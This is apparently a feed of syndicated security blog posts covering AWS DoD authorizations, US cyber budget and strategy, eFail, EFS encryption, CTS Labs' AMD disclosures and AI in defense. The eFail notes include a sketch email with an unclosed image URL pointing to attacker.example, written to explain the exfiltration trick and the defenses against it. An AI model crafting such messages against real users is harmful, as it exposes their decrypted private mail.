10 additional AWS services authorized at DoD Impact Level 6 for the AWS Secret Region

Post Syndicated from Tyler Harding original https://aws.amazon.com/blogs/security/10-additional-aws-services-authorized-dod-impact-level-6-for-aws-secret-region/

The Defense Information Systems Agency (DISA) has authorized 10 additional AWS services in the AWS Secret Region for production workloads at the Department of Defense (DoD) Impact Level (IL) 6 under the DoD’s Cloud Computing Security Requirements Guide (DoD CC SRG). With this authorization at DoD IL 6, DoD Mission Owners can process classified and mission-critical workloads for National Security Systems in the AWS Secret Region. The AWS Secret Region is available to the Department of Defense through AWS’s GSA IT Multiple Award Schedule.

AWS successfully completed an independent evaluation by members of the Intelligence Community (IC) that confirmed AWS effectively implemented 859 security controls using applicable criteria from NIST SP 800-53 Rev 4, the DoD CC SRG, and the Committee on National Security Systems Instruction No. 1253 at the Moderate Confidentiality, Moderate Integrity, and Moderate Availability impact levels.

The 10 AWS services newly authorized by DISA at IL 6 provide additional choices for DoD Mission Owners to use the capabilities of the AWS Cloud in service areas such as compute and storage, management and developer tools, analytics, and networking. With the addition of these 10 newly authorized AWS services (listed below), DoD Mission Owners can now use a total of 36 AWS services and features at IL 6.

Compute and Storage:

  • Amazon Elastic Container Registry (ECR): Store, manage, and deploy Docker container images with a fully managed container registry.
  • Amazon Elastic Container Service (ECS): Run and scale containerized applications with a highly scalable, high-performance container orchestration service.
  • AWS Lambda: Run code without provisioning or managing servers, paying only for the compute time you consume.
  • AWS Snowball Edge: Migrate data and run edge computing workloads with a physical device that provides on-board storage and compute.

Management and Developer Tools:

  • AWS Personal Health Dashboard: Monitor, manage, and optimize your AWS environment with a personalized view into the performance and availability of the AWS services underlying your AWS resources.
  • AWS Systems Manager: Automatically collect software inventory, apply OS patches, create system images, configure Windows and Linux operating systems, and seamlessly bridge your existing infrastructure with AWS.
  • AWS CodeDeploy: A fully managed deployment service that automates software deployments to a variety of compute services such as Amazon EC2, AWS Lambda, and on-premises servers.

Analytics:

  • AWS Data Pipeline: Reliably process and move data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals.

Networking:

  • AWS PrivateLink: Use secure private connectivity between Amazon Virtual Private Cloud (Amazon VPC), AWS services, and on-premises applications on the AWS network, and eliminate the exposure of data to the public internet.
  • AWS Transit Gateway: Easily connect Amazon VPCs, AWS accounts, and on-premises networks to a single gateway.

Figure 1: 10 additional AWS services authorized at DoD Impact Level 6

Newly authorized AWS services and features at DoD Impact Level 6

  1. Amazon Elastic Container Registry (ECR)
  2. Amazon Elastic Container Service (ECS)
  3. AWS CodeDeploy
  4. AWS Data Pipeline
  5. AWS Lambda
  6. AWS Personal Health Dashboard
  7. AWS PrivateLink
  8. AWS Snowball Edge
  9. AWS Systems Manager
  10. AWS Transit Gateway

Existing authorized AWS services and features at DoD Impact Level 6

  1. Amazon CloudWatch
  2. Amazon DynamoDB (DDB)
  3. Amazon Elastic Block Store (EBS)
  4. Amazon Elastic Compute Cloud (EC2)
  5. Amazon Elastic Compute Cloud (EC2) – Auto Scaling
  6. Amazon Elastic Compute Cloud (EC2) – Elastic Load Balancing (ELB) (Classic and Application Load Balancer)
  7. Amazon ElastiCache
  8. Amazon Kinesis Data Streams
  9. Amazon Redshift
  10. Amazon S3 Glacier
  11. Amazon Simple Notification Service (SNS)
  12. Amazon Simple Queue Service (SQS)
  13. Amazon Simple Storage Service (S3)
  14. Amazon Simple Workflow (SWF)
  15. Amazon Virtual Private Cloud (VPC)
  16. AWS CloudFormation
  17. AWS CloudTrail
  18. AWS Config
  19. AWS Database Migration Service (DMS)
  20. AWS Direct Connect (Dx)
  21. AWS Identity and Access Management (IAM)
  22. AWS Key Management Service (KMS)
  23. Amazon Relational Database Service (RDS) (including MariaDB, MySQL, Oracle, Postgres, and SQL Server)
  24. AWS Snowball
  25. AWS Step Functions
  26. AWS Trusted Advisor

To learn more about AWS solutions for DoD, please see our AWS solution offerings. Follow the AWS Security Blog for future updates on our Services in Scope by Compliance Program page. If you have feedback about this post, let us know in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Tyler Harding

Tyler is the DoD Compliance Program Manager within AWS Security Assurance. He has over 20 years of experience providing information security solutions to federal civilian, DoD, and intelligence agencies.

Examining the US Cyber Budget

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/06/examining_the_u.html

Jason Healey takes a detailed look at the US federal cybersecurity budget and reaches an important conclusion: the US keeps saying that we need to prioritize defense, but in fact we prioritize attack.

To its credit, this budget does reveal an overall growth in cybersecurity funding of about 5 percent above the fiscal 2019 estimate. However, federal cybersecurity spending on civilian departments like the departments of Homeland Security, State, Treasury and Justice is overshadowed by that going toward the military:

  • The Defense Department’s cyber-related budget is nearly 25 percent higher than the total going to all civilian departments, including the departments of Homeland Security, Treasury and Energy, which not only have to defend their own critical systems but also partner with critical infrastructure to help secure the energy, finance, transportation and health sectors ($9.6 billion compared to $7.8 billion).
  • The funds to support just the headquarters element — that is, not even the operational teams in facilities outside of headquarters — of U.S. Cyber Command are 33 percent higher than all the cyber-related funding to the State Department ($532 million compared to $400 million).

  • Just the increased funding to Defense was 30 percent higher than the total Homeland Security budget to improve the security of federal networks ($909 million compared to $694.1 million).

  • The Defense Department is budgeted two and a half times as much just for cyber operations as the Cybersecurity and Infrastructure Security Agency (CISA), which is nominally in charge of cybersecurity ($3.7 billion compared to $1.47 billion). In fact, the cyber operations budget is higher than the budgets for the CISA, the FBI and the Department of Justice’s National Security Division combined ($3.7 billion compared to $2.21 billion).

  • The Defense Department’s cyber operations have nearly 10 times the funding as the relevant Homeland Security defensive operational element, the National Cybersecurity and Communications Integration Center (NCCIC) ($3.7 billion compared to $371.4 million).

  • The U.S. government budgeted as much on military construction for cyber units as it did for the entirety of Homeland Security ($1.9 billion for each).

We cannot ignore what the money is telling us. The White House and National Cyber Strategy emphasize the need to protect the American people and our way of life, yet the budget does not reflect those values. Rather, the budget clearly shows that the Defense Department is the government’s main priority. Of course, the exact Defense numbers for how much is spent on offense are classified.

The US National Cyber Strategy

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/10/the_us_national.html

Last month, the White House released the “National Cyber Strategy of the United States of America.” I generally don’t have much to say about these sorts of documents. They’re filled with broad generalities. Who can argue with:

  • Defend the homeland by protecting networks, systems, functions, and data;
  • Promote American prosperity by nurturing a secure, thriving digital economy and fostering strong domestic innovation;
  • Preserve peace and security by strengthening the ability of the United States, in concert with allies and partners, to deter and, if necessary, punish those who use cyber tools for malicious purposes; and
  • Expand American influence abroad to extend the key tenets of an open, interoperable, reliable, and secure Internet.

The devil is in the details, of course. And the strategy includes no details.

In a New York Times op-ed, Josephine Wolff argues that this new strategy, together with the more-detailed Department of Defense cyber strategy and the classified National Security Presidential Memorandum 13, represent a dangerous shift of US cybersecurity posture from defensive to offensive:

…the National Cyber Strategy represents an abrupt and reckless shift in how the United States government engages with adversaries online. Instead of continuing to focus on strengthening defensive technologies and minimizing the impact of security breaches, the Trump administration plans to ramp up offensive cyberoperations. The new goal: deter adversaries through pre-emptive cyberattacks and make other nations fear our retaliatory powers.

[…]

The Trump administration’s shift to an offensive approach is designed to escalate cyber conflicts, and that escalation could be dangerous. Not only will it detract resources and attention from the more pressing issues of defense and risk management, but it will also encourage the government to act recklessly in directing cyberattacks at targets before they can be certain of who those targets are and what they are doing.

[…]

There is no evidence that pre-emptive cyberattacks will serve as effective deterrents to our adversaries in cyberspace. In fact, every time a country has initiated an unprompted cyberattack, it has invariably led to more conflict and has encouraged retaliatory breaches rather than deterring them. Nearly every major publicly known online intrusion that Russia or North Korea has perpetrated against the United States has had significant and unpleasant consequences.

Wolff is right; this is reckless. In Click Here to Kill Everybody, I argue for a “defense dominant” strategy: that while offense is essential for defense, when the two are in conflict, it should take a back seat to defense. It’s more complicated than that, of course, and I devote a whole chapter to its implications. But as computers and the Internet become more critical to our lives and society, keeping them secure becomes more important than using them to attack others.

Some notes on eFail

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/05/some-notes-on-efail.html

I’ve been busy trying to replicate the “eFail” PGP/SMIME bug. I thought I’d write up some notes.

PGP and S/MIME encrypt emails so that eavesdroppers can’t read them. The bugs potentially allow eavesdroppers to take the encrypted emails they’ve captured and resend them to you, reformatted in a way that tricks your email client into decrypting them and leaking the plaintext back to the attacker.

Disable remote/external content in email

The most important defense is to disable “external” or “remote” content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. Senders do this legitimately when they want to display images without bloating the email itself. But most of the time it’s illegitimate: they hide images in the message in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and that the width/height of this image is set to one pixel, so you don’t even see it:
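A hypothetical tracker of that shape (the domain and tracking ID below are made up for illustration):

<img src="http://links.example-campaign.org/o.gif?id=1bf9a2c4e7d3550f" width="1" height="1">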

Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:
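If you prefer Thunderbird’s config editor (about:config) to the settings dialog, the preference that governs this is, to the best of my knowledge:

user_pref("mailnews.message_display.disable_remote_image", true);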

The problem is that as you read email messages, you often get frustrated by error messages and missing content, so you keep adding exceptions:

The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren’t to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on and tamper with, so it doesn’t matter whether they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That’s probably overkill. As long as the attacker can’t use the “remote content” in emails, you are fine. Likewise, some have recommended disabling HTML completely. That’s not even an option in any email client I’ve used — you can disable sending HTML emails, but not receiving them. It’s sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn’t replicate the direct exfiltration

There are two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like one of those tracking tags), allowing the entire message to be decrypted.

An example of this is the following email. This is a standard HTML email message consisting of multiple parts. The trick is that the IMG tag in the first part starts the URL (blog.robertgraham.com/…) but doesn’t end it. It has the starting quote in front of the URL but no ending quote. The ending quote will come in the next chunk.

The next chunk isn’t HTML, though, it’s PGP. The PGP extension (in my case, Enigmail) will detect this and automatically decrypt it. In this case, it’s a previous email message of mine that the attacker captured by eavesdropping and then pasted into this email in order to get it decrypted.
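Putting the two parts together, a minimal sketch of that message structure might look like the following (the boundary, attacker domain, and ciphertext are all placeholders; this illustrates the shape only and is not a working exploit):

# Illustrative only: the HTML part opens an IMG src quote and never
# closes it; the next MIME part is the captured ciphertext, which the
# victim's PGP plugin will decrypt automatically.
cat > efail-sketch.eml <<'EOF'
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<img src="http://attacker.example/collect?
--BOUNDARY
Content-Type: text/plain

-----BEGIN PGP MESSAGE-----
(captured ciphertext pasted here by the attacker)
-----END PGP MESSAGE-----
--BOUNDARY--
EOF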

What should happen at this point is that Thunderbird will generate a request (if “remote content” is enabled) to the blog.robertgraham.com server with the decrypted contents of the PGP email appended to it. But that’s not what happens. Instead, I get this:

I am indeed getting weird stuff in the URL (the bit after the GET /), but it’s not the decrypted PGP message. Instead, what’s going on is that when Thunderbird puts together a “multipart/mixed” message, it adds its own HTML tags, consisting of lines between each part. In the email client it looks like this:

The HTML code it adds looks like:

That’s what you see in the above URL: all this code up to the first quote. That quote terminates the unclosed quote in the URL from the first multipart section, causing the rest of the content to be ignored (as far as being sent as part of the URL).

So at least for the latest version of Thunderbird, you are accidentally safe, even if you have “remote content” enabled. Though, this is only according to my tests; there may be a workaround that hackers could exploit.

STARTTLS

In the old days, email was sent plaintext over the wire so that it could be passively eavesdropped on. Nowadays, most providers send it via “STARTTLS”, which sorta encrypts it. Attackers can still intercept such email, but they have to do so actively, using man-in-the-middle. Such active techniques can be detected if you are careful and look for them.

Some organizations don’t care. Apparently, some nation states are just blocking all STARTTLS and forcing email to be sent unencrypted. Others do care. The NSA will passively sniff all the email they can in nations like Iraq, but they won’t actively intercept STARTTLS messages, for fear of getting caught.

The consequence is that it’s much less likely that somebody has been eavesdropping on you, passively grabbing all your PGP/SMIME emails. If you fear they have been, you should look (e.g. send emails from GMail and see if they are intercepted by sniffing the wire).
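One quick way to check whether a given provider offers STARTTLS at all is to drive the handshake by hand (the server name here is a placeholder):

$ openssl s_client -connect smtp.example.com:587 -starttls smtp

If the certificate chain comes back cleanly, the server supports STARTTLS; an active man-in-the-middle stripping it should surface as a handshake failure here.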

You’ll know if you are getting hacked

If somebody attacks you using eFail, you’ll know. You’ll get an email message formatted this way, with multipart/mixed components, some with corrupt HTML, some encrypted via PGP. This means that for the most part, your risk is that you’ll be attacked only once — the hacker will only be able to get one message through and decrypt it before you notice that something is amiss. Though to be fair, they can probably include all the emails they want decrypted as attachments to the single email they sent you, so the risk isn’t necessarily that you’ll only get one decrypted.

As mentioned above, a lot of attackers (e.g. the NSA) won’t attack you if it’s so easy to get caught. Other attackers, though, like anonymous hackers, don’t care.

Somebody ought to write a plugin to Thunderbird to detect this.

Summary

  • It only works if attackers have already captured your emails (though, that’s why you use PGP/SMIME in the first place, to guard against that).
  • It only works if you’ve enabled your email client to automatically grab external/remote content.
  • It seems to not be easily reproducible in all cases.
  • Instead of disabling PGP/SMIME, you should make sure your email client has remote/external content disabled — that’s a huge privacy violation even without this bug.

Notes: The default email client on the Mac enables remote content by default, which is bad.

How AWS Meets a Physical Separation Requirement with a Logical Separation Approach

Post Syndicated from Min Hyun original https://aws.amazon.com/blogs/security/how-aws-meets-a-physical-separation-requirement-with-a-logical-separation-approach/

We have a new resource available to help you meet a requirement for physically separated infrastructure using logical separation in the AWS Cloud. Our latest guide, Logical Separation: An Evaluation of the U.S. Department of Defense Cloud Security Requirements for Sensitive Workloads, outlines how AWS meets the U.S. Department of Defense’s (DoD) stringent physical separation requirement by pioneering a three-pronged logical separation approach that leverages virtualization, encryption, and the deployment of compute to dedicated hardware.

This guide will help you understand logical separation in the cloud and demonstrate its advantages over a traditional physical separation model. Embracing this approach can help organizations confidently meet or exceed security requirements found in traditional on-premises environments, while also providing increased security control and flexibility.

Logical Separation is the second guide in the AWS Government Handbook Series, which examines cybersecurity policy initiatives and identifies best practices.

If you have questions or want to learn more, contact your account executive or AWS Support.

NIST Issues Call for "Lightweight Cryptography" Algorithms

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/05/nist_issues_cal.html

This is interesting:

Creating these defenses is the goal of NIST’s lightweight cryptography initiative, which aims to develop cryptographic algorithm standards that can work within the confines of a simple electronic device. Many of the sensors, actuators and other micromachines that will function as eyes, ears and hands in IoT networks will work on scant electrical power and use circuitry far more limited than the chips found in even the simplest cell phone. Similar small electronics exist in the keyless entry fobs to newer-model cars and the Radio Frequency Identification (RFID) tags used to locate boxes in vast warehouses.

All of these gadgets are inexpensive to make and will fit nearly anywhere, but common encryption methods may demand more electronic resources than they possess.

The NSA’s SIMON and SPECK would certainly qualify.

[$] A successful defense against a copyright troll

Post Syndicated from jake original https://lwn.net/Articles/752485/rss

At the 2018 Legal and Licensing Workshop (LLW), which is a yearly gathering of lawyers and technical folks organized by the Free Software Foundation Europe (FSFE), attendees got more details on a recent hearing in a German GPL enforcement case. Marcus von Welser is a lawyer who represented the defendant, Geniatech, in a case that was brought by Patrick McHardy. In the presentation, von Welser was joined by Armijn Hemel, who helped Geniatech in its compliance efforts. The hearing was of interest for a number of reasons, not least because McHardy withdrew his request for an injunction once it became clear that the judge was leaning in favor of the defendants — effectively stopping this case dead in its tracks.

OMG The Stupid It Burns

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/04/omg-stupid-it-burns.html

This article, pointed out by @TheGrugq, is stupid enough that it’s worth rebutting.

The article starts with the question “Why did the lessons of Stuxnet, Wannacry, Heartbleed and Shamoon go unheeded?”. It then proceeds to ignore the lessons of those things.

Some of the actual lessons should be things like how Stuxnet crossed air gaps, how Wannacry spread through flat Windows networking, how Heartbleed comes from technical debt, and how Shamoon furthers state aims by causing damage.

But this article doesn’t cover the technical lessons. Instead, it thinks the lesson should be the moral lesson, that we should take these things more seriously. But that’s stupid. It’s the sort of lesson people who know nothing about the topic teach you. When you have nothing of value to contribute to a topic you can always take the moral high road and criticize everyone for being morally weak for not taking it more seriously. Obviously, since doctors haven’t cured cancer yet, it’s because they don’t take the problem seriously.
The article continues to ignore the lesson of these cyber attacks and instead regales us with a list of military lessons from WW I and WW II. This makes the same mistake that many in the military make, trying to understand cyber through analogies with the real world. It’s not that such lessons could have no value, it’s that this article contains a poor list of them. It seems to consist of a random list of events that appeal to the author rather than events that have bearing on cybersecurity.

Then, in case we don’t get the point, the article bullies us with hyperbole, cliches, buzzwords, bombastic language, famous quotes, and citations. It’s hard to see how most of them actually apply to the text. Rather, it seems like they are included simply because he really really likes them.

The article invests much effort in discussing the buzzword “OODA loop”. Most attacks in cyberspace don’t have one. Instead, attackers flail around, trying lots of random things, overcoming defense with brute force rather than an understanding of what’s going on. That’s obviously the case with Wannacry: it was an accident, with the perpetrator experimenting with what would happen if they added the ETERNALBLUE exploit to their existing ransomware code. The consequence was beyond anybody’s ability to predict.

You might claim that this is just the first stage, that they’ll loop around, observe Wannacry’s effects, orient themselves, decide, then act upon what they learned. Nope. Wannacry burned the exploit. It’s essentially removed any vulnerable systems from the public Internet, thereby making it impossible to use what they learned. It’s still active a year later, with infected systems behind firewalls busily scanning the Internet so that if you put a new system online that’s vulnerable, it’ll be taken offline within a few hours, before any other evildoer can take advantage of it.

See what I’m doing here? Learning the actual lessons of things like Wannacry? The thing the above article fails to do??
The article has a humorous paragraph on “defense in depth”, misunderstanding the term. To be fair, it’s the cybersecurity industry’s fault: it adopted and then redefined the term. That’s why there are two separate articles on Wikipedia: one for the old military term (as used in this article) and one for the new cybersecurity term.

As used in the cybersecurity industry, “defense in depth” means having multiple layers of security. Many organizations put all their defensive efforts on the perimeter, and none inside the network. The idea of “defense in depth” is to put more defenses inside the network. For example, instead of just one firewall at the edge of the network, put firewalls inside the network to segment different subnetworks from each other, so that a ransomware infection in the customer-support computers doesn’t spread to the sales and marketing computers, as the sketch below illustrates.
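As a concrete sketch of that idea (the subnets below are made up, and real deployments would be more involved):

# Hypothetical internal segmentation on a Linux router: permit
# established return traffic, then block new connections from the
# customer-support subnet (10.10.20.0/24) to sales/marketing
# (10.10.30.0/24).
$ sudo iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
$ sudo iptables -A FORWARD -s 10.10.20.0/24 -d 10.10.30.0/24 -j DROP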
The article talks about exploiting WiFi chips to bypass defense in depth measures like browser sandboxes. This is conflating different types of attacks. A WiFi attack is usually considered a local attack, from somebody next to you in a bar, rather than a remote attack from a server in Russia. Moreover, far from disproving “defense in depth”, such WiFi attacks highlight the need for it. Namely, phones need to be designed so that successful exploitation of other microprocessors (namely, the WiFi, Bluetooth, and cellular baseband chips) can’t directly compromise the host system. In other words, once exploited with “Broadpwn”, a hacker would need to extend the exploit chain with another vulnerability in the host’s Broadcom WiFi driver rather than immediately exploiting a DMA attack across PCIe. This suggests that if PCIe is used to interface with peripherals in the phone, an IOMMU should be used, for “defense in depth”.
Cybersecurity is a young field. There are lots of useful things that outsider non-techies can teach us. Lessons from military history would be well received.

But that’s not this story. Instead, this story is by an outsider telling us we don’t know what we are doing, that they do, who then proceeds to prove they don’t know what they are doing. Their argument is based on moral suasion and on bullying us with what appears on the surface to be intellectual rigor, but which is in fact devoid of anything smart.

My fear, here, is that I’m going to be in a meeting where somebody has read this pretentious garbage, explaining to me why “defense in depth” is wrong and how we need to OODA faster. I’d rather nip this in the bud, pointing out that if you found anything interesting in that article, you are wrong.

[$] Finding Spectre vulnerabilities with smatch

Post Syndicated from corbet original https://lwn.net/Articles/752408/rss

The furor over the Meltdown and Spectre vulnerabilities has calmed a bit — for now, at least — but that does not mean that developers have stopped worrying about them. Spectre variant 1 (the bounds-check bypass vulnerability) has been of particular concern because, while the kernel is thought to contain numerous vulnerable spots, nobody really knows how to find them all. As a result, the defenses that have been developed for variant 1 have only been deployed in a few places. Recently, though, Dan Carpenter has enhanced the smatch tool to enable it to find possibly vulnerable code in the kernel.

Introducing Microsoft Azure Sphere

Post Syndicated from corbet original https://lwn.net/Articles/751994/rss

Microsoft has issued a press release describing the security dangers involved with the Internet of things (“a weaponized stove, baby monitors that spy, the contents of your refrigerator being held for ransom”) and introducing “Microsoft Azure Sphere” as a combination of hardware and software to address the problem. “Unlike the RTOSes common to MCUs today, our defense-in-depth IoT OS offers multiple layers of security. It combines security innovations pioneered in Windows, a security monitor, and a custom Linux kernel to create a highly-secured software environment and a trustworthy platform for new IoT experiences.”

DARPA Funding in AI-Assisted Cybersecurity

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/04/darpa_funding_i.html

DARPA is launching a program aimed at vulnerability discovery via human-assisted AI. The new DARPA program is called CHESS (Computers and Humans Exploring Software Security), and they’re holding a proposers day in a week and a half.

This is the kind of thing that can dramatically change the offense/defense balance.

New – Encryption of Data in Transit for Amazon EFS

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/new-encryption-of-data-in-transit-for-amazon-efs/

Amazon Elastic File System was designed to be the file system of choice for cloud-native applications that require shared access to file-based storage. We launched EFS in mid-2016 and have added several important features since then including on-premises access via Direct Connect and encryption of data at rest. We have also made EFS available in additional AWS Regions, most recently US West (Northern California). As was the case with EFS itself, these enhancements were made in response to customer feedback, and reflect our desire to serve an ever-widening customer base.

Encryption in Transit

Today we are making EFS even more useful with the addition of support for encryption of data in transit. When used in conjunction with the existing support for encryption of data at rest, you now have the ability to protect your stored files using a defense-in-depth security strategy.

In order to make it easy for you to implement encryption in transit, we are also releasing an EFS mount helper. The helper (available in source code and RPM form) takes care of setting up a TLS tunnel to EFS, and also allows you to mount file systems by ID. The two features are independent; you can use the helper to mount file systems by ID even if you don’t make use of encryption in transit. The helper also supplies a recommended set of default options to the actual mount command.
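For example (using the file system ID from the walkthrough below), mounting by ID without encryption in transit should look the same as the TLS mount, minus the option:

$ sudo mount -t efs fs-92758f7b /mnt/efs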

Setting up Encryption

I start by installing the EFS mount helper on my Amazon Linux instance:

$ sudo yum install -y amazon-efs-utils

Next, I visit the EFS Console and capture the file system ID:

Then I specify the ID (and the TLS option) to mount the file system:

$ sudo mount -t efs fs-92758f7b -o tls /mnt/efs

And that’s it! The encryption is transparent and has an almost negligible impact on data transfer speed.
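If you want the TLS mount to persist across reboots, the mount helper also understands /etc/fstab; a minimal sketch using the same file system ID (exact option syntax may vary with the helper version):

fs-92758f7b:/ /mnt/efs efs _netdev,tls 0 0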

Available Now

You can start using encryption in transit today in all AWS Regions where EFS is available.

The mount helper is available for Amazon Linux. If you are running another distribution of Linux you will need to clone the GitHub repo and build your own RPM, as described in the README.

Jeff;

Israeli Security Attacks AMD by Publishing Zero-Day Exploits

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/israeli_securit.html

Last week, the Israeli security company CTS Labs published a series of exploits against AMD chips. The publication came with the flashy website, detailed whitepaper, cool vulnerability names — RYZENFALL, MASTERKEY, FALLOUT, and CHIMERA — and logos we’ve come to expect from these sorts of things. What’s new is that the company only gave AMD a day’s notice, which breaks with every norm about responsible disclosure. CTS Labs didn’t release details of the exploits, only high-level descriptions of the vulnerabilities, but it is probably still enough for others to reproduce their results. This is incredibly irresponsible of the company.

Moreover, the vulnerabilities are kind of meh. Nicholas Weaver explains:

In order to use any of the four vulnerabilities, an attacker must already have almost complete control over the machine. For most purposes, if the attacker already has this access, we would generally say they’ve already won. But these days, modern computers at least attempt to protect against a rogue operating system by having separate secure subprocessors. CTS Labs discovered the vulnerabilities when they looked at AMD’s implementation of the secure subprocessor to see if an attacker, having already taken control of the host operating system, could bypass these last lines of defense.

In a “Clarification,” CTS Labs kind of agrees:

The vulnerabilities described in amdflaws.com could give an attacker that has already gained initial foothold into one or more computers in the enterprise a significant advantage against IT and security teams.

The only thing the attacker would need after the initial local compromise is local admin privileges and an affected machine. To clarify misunderstandings — there is no need for physical access, no digital signatures, no additional vulnerability to reflash an unsigned BIOS. Buy a computer from the store, run the exploits as admin — and they will work (on the affected models as described on the site).

The weirdest thing about this story is that CTS Labs describes one of the vulnerabilities, Chimera, as a backdoor. Although it doesn’t come out and say that this was deliberately planted by someone, it does make the point that the chips were designed in Taiwan. This is an incredible accusation, and honestly needs more evidence before we can evaluate it.

The upshot of all of this is that CTS Labs played this for maximum publicity: over-hyping its results and minimizing AMD’s ability to respond. And it may have an ulterior motive:

But CTS’s website touting AMD’s flaws also contained a disclaimer that threw some shadows on the company’s motives: “Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports,” reads one line. WIRED asked in a follow-up email to CTS whether the company holds any financial positions designed to profit from the release of its AMD research specifically. CTS didn’t respond.

We all need to demand better behavior from security researchers. I know that any publicity is good publicity, but I am pleased to see the stories critical of CTS Labs outnumbering the stories praising it.

EDITED TO ADD (3/21): AMD responds:

AMD’s response today agrees that all four bug families are real and are found in the various components identified by CTS. The company says that it is developing firmware updates for the three PSP flaws. These fixes, to be made available in “coming weeks,” will be installed through system firmware updates. The firmware updates will also mitigate, in some unspecified way, the Chimera issue, with AMD saying that it’s working with ASMedia, the third-party hardware company that developed Promontory for AMD, to develop suitable protections. In its report, CTS wrote that, while one CTS attack vector was a firmware bug (and hence in principle correctable), the other was a hardware flaw. If true, there may be no effective way of solving it.


Artificial Intelligence and the Attack/Defense Balance

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/artificial_inte.html

Artificial intelligence technologies have the potential to upend the longstanding advantage that attack has over defense on the Internet. This has to do with the relative strengths and weaknesses of people and computers, how those all interplay in Internet security, and where AI technologies might change things.

You can divide Internet security tasks into two sets: what humans do well and what computers do well. Traditionally, computers excel at speed, scale, and scope. They can launch attacks in milliseconds and infect millions of computers. They can scan computer code to look for particular kinds of vulnerabilities, and data packets to identify particular kinds of attacks.

Humans, conversely, excel at thinking and reasoning. They can look at the data and distinguish a real attack from a false alarm, understand the attack as it’s happening, and respond to it. They can find new sorts of vulnerabilities in systems. Humans are creative and adaptive, and can understand context.

Computers — so far, at least — are bad at what humans do well. They’re not creative or adaptive. They don’t understand context. They can behave irrationally because of those things.

Humans are slow, and get bored at repetitive tasks. They’re terrible at big data analysis. They use cognitive shortcuts, and can only keep a few data points in their head at a time. They can also behave irrationally because of those things.

AI will allow computers to take over Internet security tasks from humans, and then do them faster and at scale. Here are possible AI capabilities:

  • Discovering new vulnerabilities — and, more importantly, new types of vulnerabilities — in systems, both by the offense to exploit and by the defense to patch, and then automatically exploiting or patching them.
  • Reacting and adapting to an adversary’s actions, again both on the offense and defense sides. This includes reasoning about those actions and what they mean in the context of the attack and the environment.
  • Abstracting lessons from individual incidents, generalizing them across systems and networks, and applying those lessons to increase attack and defense effectiveness elsewhere.
  • Identifying strategic and tactical trends from large datasets and using those trends to adapt attack and defense tactics.

That’s an incomplete list. I don’t think anyone can predict what AI technologies will be capable of. But it’s not unreasonable to look at what humans do today and imagine a future where AIs are doing the same things, only at computer speeds, scale, and scope.

Both attack and defense will benefit from AI technologies, but I believe that AI has the capability to tip the scales more toward defense. There will be better offensive and defensive AI techniques. But here’s the thing: defense is currently in a worse position than offense precisely because of the human components. Present-day attacks pit the relative advantages of computers and humans against the relative weaknesses of computers and humans. Computers moving into what are traditionally human areas will rebalance that equation.

Roy Amara famously said that we overestimate the short-term effects of new technologies, but underestimate their long-term effects. AI is notoriously hard to predict, so many of the details I speculate about are likely to be wrong — and AI is likely to introduce new asymmetries that we can’t foresee. But AI is the most promising technology I’ve seen for bringing defense up to par with offense. For Internet security, that will change everything.

This essay previously appeared in the March/April 2018 issue of IEEE Security & Privacy.

Welcome Lin – Our Newest Support Tech!

Post Syndicated from Yev original https://www.backblaze.com/blog/welcome-lin-newest-support-tech/

As Backblaze continues to grow, a couple of our departments need to grow right along with it. One of the quickest-growing departments we have at Backblaze is Customer Support. We do all of our support in-house, and the team grows to accommodate our growing customer base! We have a new person joining us in support, Lin! Let’s take a moment to learn a bit more about her, shall we?

What is your Backblaze Title?
Jr. Support Technician.

Where are you originally from?
Ventura, CA. It’s okay if you haven’t heard of it, it is very, very, small.

What attracted you to Backblaze?
The company culture, the delightful ads on Critical Role, and how immediately genuinely friendly everyone I met was.

Where else have you worked?
I previously did content management at Wish, and an awful lot of temp gigs. I did a few years at a coffee shop at the beginning of college, but my first job ever was at JoAnn’s Fabrics.

Where did you go to school?
San Francisco State University

What’s your dream job?
Magical Girl!

Favorite place you’ve traveled?
Tokyo, but Disneyworld is a real close second.

Favorite hobby?
I spend an awful lot of time playing video games, and possibly even more making silly costumes.

Star Trek or Star Wars?
Truthfully I love both. But I was raised on original series and next generation Trek.

Coke or Pepsi?
Coke … definitely coke.

Favorite food?
Cupcakes. Especially funfetti cupcakes.

Anything else you’d like to tell us?
I discovered Sailor Moon as a child and it possibly influenced my life way too much. Like many people here, I am a huge Disney fan; anyone who spends longer than a few hours with me will probably tell you I can go on for hours about my cat (but in my defense, he’s adorable and fluffy and I have the pictures to prove it).

We keep hiring folks that love Disney! It’s kind of amazing. It’s also nice to have folks in the office that can chat about the latest Critical Role episode! Welcome aboard Lin, we’ll try to get some funfetti stocked for the cupcakes that come in!


Setting up bug bounties for success

Post Syndicated from Michal Zalewski original https://lcamtuf.blogspot.com/2018/03/setting-up-bug-bounties-for-success.html

Bug bounties end up in the news with some regularity, usually for the wrong reasons. I’ve been itching to write
about that for a while – but instead of dwelling on the mistakes of the bygone days, I figured it may be better to
